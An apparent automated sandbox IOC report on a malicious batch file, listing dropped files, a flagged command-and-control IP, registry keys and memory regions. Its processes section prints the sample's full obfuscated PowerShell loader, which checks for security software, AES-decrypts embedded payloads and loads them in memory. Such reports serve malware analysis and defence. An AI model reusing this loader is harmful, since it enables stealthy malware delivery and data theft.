IOC Report
z52PO0048857.cmd

loading gif

Files

File Path
Type
Category
Malicious
z52PO0048857.cmd
DOS batch file, ASCII text, with very long lines (61338), with CRLF line terminators
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4czvfbzv.1zw.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e5un1atl.uht.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o0quh5wl.lok.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ylubsnwe.iv2.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\tmpE9EE.tmp
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
dropped
C:\Users\user\AppData\Local\Temp\tmpE9FF.tmp
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
dropped
C:\Users\user\AppData\Local\Temp\tmpEA0F.tmp
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
dropped
C:\Users\user\AppData\Local\Temp\tmpEA20.tmp
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
dropped
C:\Users\user\AppData\Local\Temp\tmpEA30.tmp
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
dropped
C:\Users\user\AppData\Local\Temp\tmpEA41.tmp
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
dropped
C:\Users\user\AppData\Local\Temp\tmpEA52.tmp
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
dropped
C:\Users\user\AppData\Local\Temp\tmpEA62.tmp
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
dropped
C:\Users\user\AppData\Local\Temp\tmpEA92.tmp
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
dropped
C:\Users\user\AppData\Local\Temp\tmpEAA3.tmp
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
dropped
C:\Users\user\AppData\Local\Temp\tmpEAC3.tmp
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
dropped
C:\Users\user\AppData\Local\Temp\tmpEAD4.tmp
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
dropped
C:\Users\user\AppData\Local\Temp\tmpEB04.tmp
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
dropped
C:\Users\user\AppData\Local\Temp\tmpEB14.tmp
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
dropped
C:\Users\user\AppData\Local\Temp\tmpEB34.tmp
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
dropped
C:\Users\user\AppData\Local\Temp\tmpEB35.tmp
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
dropped
C:\Users\user\AppData\Local\Temp\tmpEB65.tmp
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
dropped
C:\Users\user\AppData\Local\Temp\tmpEB66.tmp
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
dropped
C:\Users\user\AppData\Local\Temp\tmpEB77.tmp
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
dropped
C:\Users\user\AppData\Local\Temp\tmpEB88.tmp
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
dropped
C:\Users\user\AppData\Local\Temp\tmpEB89.tmp
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
dropped
C:\Users\user\AppData\Local\Temp\tmpEB99.tmp
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
dropped
C:\Users\user\AppData\Local\Temp\tmpEB9A.tmp
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
dropped
C:\Users\user\AppData\Local\Temp\tmpEBAB.tmp
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
dropped
C:\Users\user\AppData\Local\Temp\tmpEBAC.tmp
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
dropped
C:\Users\user\AppData\Local\Temp\tmpEBBC.tmp
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
dropped
C:\Users\user\AppData\Local\Temp\tmpEBCD.tmp
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
dropped
C:\Users\user\AppData\Local\Temp\tmpEBDE.tmp
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
dropped
C:\Users\user\AppData\Local\Temp\tmpEBEE.tmp
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
dropped
C:\Users\user\AppData\Local\Temp\tmpEBFF.tmp
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
dropped
C:\Users\user\AppData\Local\Temp\tmpEC10.tmp
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
dropped
C:\Users\user\AppData\Local\Temp\tmpEC20.tmp
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
dropped
C:\Users\user\AppData\Local\Temp\tmpEC31.tmp
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
dropped
C:\Users\user\AppData\Local\Temp\tmpEC32.tmp
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
dropped
C:\Users\user\AppData\Local\Temp\tmpECB0.tmp
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
dropped
C:\Users\user\AppData\Local\Temp\tmpECC0.tmp
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
dropped
C:\Users\user\AppData\Local\Temp\tmpECD1.tmp
SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
dropped
C:\Users\user\AppData\Local\Temp\tmpECD2.tmp
SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
dropped
C:\Users\user\AppData\Local\Temp\tmpEEE6.tmp
ASCII text, with very long lines (1024), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\tmpEEE7.tmp
ASCII text, with very long lines (1024), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\tmpEEF8.tmp
ASCII text, with very long lines (1024), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\tmpEEF9.tmp
ASCII text, with very long lines (1024), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\tmpEEFA.tmp
ASCII text, with very long lines (1024), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\tmpEEFB.tmp
ASCII text, with very long lines (1024), with CRLF line terminators
dropped
\Device\ConDrv
ASCII text, with very long lines (2253), with CRLF line terminators
dropped
There are 42 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\z52PO0048857.cmd" "
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\Desktop\z52PO0048857.cmd';$BczT='GeRVWptRVWpCRVWpurRVWpreRVWpntRVWpPRVWproRVWpcRVWpessRVWp'.Replace('RVWp', ''),'SpdpWdlitdpWd'.Replace('dpWd', ''),'EntUUZwrUUZwyPUUZwoUUZwinUUZwtUUZw'.Replace('UUZw', ''),'ElmNutemNutmmNutentmNutAtmNut'.Replace('mNut', ''),'LoZlRdadZlRd'.Replace('ZlRd', ''),'FriYMJomiYMJBiYMJasiYMJe64iYMJStiYMJriiYMJngiYMJ'.Replace('iYMJ', ''),'CDTtzhaDTtznDTtzgeDTtzExDTtzteDTtznsDTtzioDTtznDTtz'.Replace('DTtz', ''),'TrUPQEanUPQEsfUPQEormUPQEFUPQEiUPQEnUPQEalUPQEBUPQElocUPQEkUPQE'.Replace('UPQE', ''),'IqNQJnvqNQJoqNQJkeqNQJ'.Replace('qNQJ', ''),'CoqEENpqEENyqEENToqEEN'.Replace('qEEN', ''),'CrehWBeaehWBteehWBDehWBeehWBcehWBrypehWBtorehWB'.Replace('ehWB', ''),'MaQHwVinQHwVModQHwVuQHwVleQHwV'.Replace('QHwV', ''),'ReoviQadLoviQinoviQeoviQsoviQ'.Replace('oviQ', ''),'Devonzcomvonzpvonzrevonzssvonz'.Replace('vonz', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($BczT[0])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function pWQul($PgjTo){$ArRhZ=[System.Security.Cryptography.Aes]::Create();$ArRhZ.Mode=[System.Security.Cryptography.CipherMode]::CBC;$ArRhZ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$ArRhZ.Key=[System.Convert]::($BczT[5])('BCbtvIveY0T0lkWSkDxWOMe/c90s1PvXXJN390CRmts=');$ArRhZ.IV=[System.Convert]::($BczT[5])('JbfpGWq+SHjQD2Awma012A==');$BcXUN=$ArRhZ.($BczT[10])();$RcqyN=$BcXUN.($BczT[7])($PgjTo,0,$PgjTo.Length);$BcXUN.Dispose();$ArRhZ.Dispose();$RcqyN;}function iDUTr($PgjTo){$bKrDu=New-Object System.IO.MemoryStream(,$PgjTo);$gnvgt=New-Object System.IO.MemoryStream;$atXgD=New-Object System.IO.Compression.GZipStream($bKrDu,[IO.Compression.CompressionMode]::($BczT[13]));$atXgD.($BczT[9])($gnvgt);$atXgD.Dispose();$bKrDu.Dispose();$gnvgt.Dispose();$gnvgt.ToArray();}$XZgdm=[System.IO.File]::($BczT[12])([Console]::Title);$IbVAd=iDUTr (pWQul ([Convert]::($BczT[5])([System.Linq.Enumerable]::($BczT[3])($XZgdm, 5).Substring(2))));$AAuWz=iDUTr (pWQul ([Convert]::($BczT[5])([System.Linq.Enumerable]::($BczT[3])($XZgdm, 6).Substring(2))));[System.Reflection.Assembly]::($BczT[4])([byte[]]$AAuWz).($BczT[2]).($BczT[8])($null,$null);[System.Reflection.Assembly]::($BczT[4])([byte[]]$IbVAd).($BczT[2]).($BczT[8])($null,$null); "

URLs

Name
IP
Malicious
http://51.195.145.77:57942/
51.195.145.77
malicious
https://ac.ecosia.org/autocomplete?q=
unknown
https://duckduckgo.com/chrome_newtab
unknown
https://duckduckgo.com/ac/?q=
unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico
unknown
http://crl.micro
unknown
https://aka.ms/pscore6lB
unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
unknown
https://www.ecosia.org/newtab/
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
unknown
There are 3 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
api.ip.sb
unknown
malicious

IPs

IP
Domain
Country
Malicious
51.195.145.77
unknown
France
malicious

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
There are 5 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
556E000
trusted library allocation
page read and write
51D3000
trusted library allocation
page read and write
782A000
heap
page read and write
51C1000
trusted library allocation
page read and write
3050000
heap
page read and write
794E000
stack
page read and write
55B8000
trusted library allocation
page read and write
3054000
heap
page read and write
84D0000
trusted library allocation
page read and write
78E0000
trusted library allocation
page execute and read and write
4A78000
heap
page read and write
5070000
heap
page execute and read and write
325F000
stack
page read and write
51F8000
trusted library allocation
page read and write
61B9000
trusted library allocation
page read and write
4B6D000
trusted library allocation
page execute and read and write
2F40000
heap
page read and write
313B000
heap
page read and write
7A70000
heap
page read and write
78F0000
trusted library allocation
page read and write
78D0000
trusted library allocation
page read and write
7A10000
trusted library allocation
page read and write
7510000
heap
page read and write
4B79000
trusted library allocation
page read and write
743E000
stack
page read and write
30D9000
heap
page read and write
7857000
heap
page read and write
4EE2000
trusted library allocation
page read and write
5291000
trusted library allocation
page read and write
7530000
heap
page read and write
7A50000
trusted library allocation
page read and write
784D000
heap
page read and write
5294000
trusted library allocation
page read and write
7A0D000
stack
page read and write
304D000
stack
page read and write
783A000
heap
page read and write
5214000
trusted library allocation
page read and write
55B4000
trusted library allocation
page read and write
79CE000
stack
page read and write
2FCD000
unkown
page read and write
503E000
stack
page read and write
7AB0000
trusted library allocation
page read and write
2F80000
heap
page read and write
2EC8000
stack
page read and write
733E000
stack
page read and write
778F000
stack
page read and write
783E000
heap
page read and write
5040000
trusted library allocation
page execute and read and write
61D9000
trusted library allocation
page read and write
7A30000
trusted library allocation
page read and write
77C0000
heap
page read and write
7A40000
trusted library allocation
page read and write
4B63000
trusted library allocation
page execute and read and write
76CE000
stack
page read and write
32B3000
heap
page read and write
51A0000
heap
page execute and read and write
308B000
heap
page read and write
2F50000
heap
page read and write
50CE000
stack
page read and write
510E000
stack
page read and write
6218000
trusted library allocation
page read and write
4F90000
heap
page readonly
4FFC000
stack
page read and write
7525000
heap
page read and write
4EE0000
trusted library allocation
page read and write
72FB000
stack
page read and write
528B000
trusted library allocation
page read and write
2F8A000
heap
page read and write
3060000
heap
page read and write
7AD0000
trusted library allocation
page read and write
518E000
stack
page read and write
4B80000
heap
page read and write
7AF0000
trusted library allocation
page execute and read and write
3098000
heap
page read and write
4B70000
trusted library allocation
page read and write
72BD000
stack
page read and write
7863000
heap
page read and write
4EE5000
trusted library allocation
page execute and read and write
747B000
stack
page read and write
73BD000
stack
page read and write
61B1000
trusted library allocation
page read and write
2E8B000
stack
page read and write
32B0000
heap
page read and write
514E000
stack
page read and write
722F000
stack
page read and write
4EE7000
trusted library allocation
page execute and read and write
32A0000
trusted library allocation
page read and write
51BE000
trusted library allocation
page read and write
300E000
unkown
page read and write
5075000
heap
page execute and read and write
52BC000
trusted library allocation
page read and write
750B000
stack
page read and write
3134000
heap
page read and write
77CB000
heap
page read and write
7A20000
trusted library allocation
page read and write
5381000
trusted library allocation
page read and write
737E000
stack
page read and write
4F4E000
stack
page read and write
7AE0000
trusted library allocation
page read and write
798E000
stack
page read and write
7A80000
trusted library allocation
page read and write
5288000
trusted library allocation
page read and write
84E0000
trusted library allocation
page read and write
7A60000
trusted library allocation
page read and write
4A60000
heap
page read and write
5280000
trusted library allocation
page read and write
77E6000
heap
page read and write
7AC0000
trusted library allocation
page read and write
74CE000
stack
page read and write
73FA000
stack
page read and write
774E000
stack
page read and write
4F8E000
stack
page read and write
4B60000
trusted library allocation
page read and write
7AA0000
trusted library allocation
page read and write
4F00000
trusted library allocation
page read and write
77E9000
heap
page read and write
3260000
heap
page read and write
78C0000
heap
page execute and read and write
54A6000
trusted library allocation
page read and write
4B64000
trusted library allocation
page read and write
5050000
heap
page read and write
5060000
trusted library allocation
page read and write
7A90000
trusted library allocation
page read and write
51B1000
trusted library allocation
page read and write
71EE000
stack
page read and write
30E5000
heap
page read and write
3139000
heap
page read and write
770E000
stack
page read and write
5560000
trusted library allocation
page read and write
There are 119 hidden memdumps, click here to show them.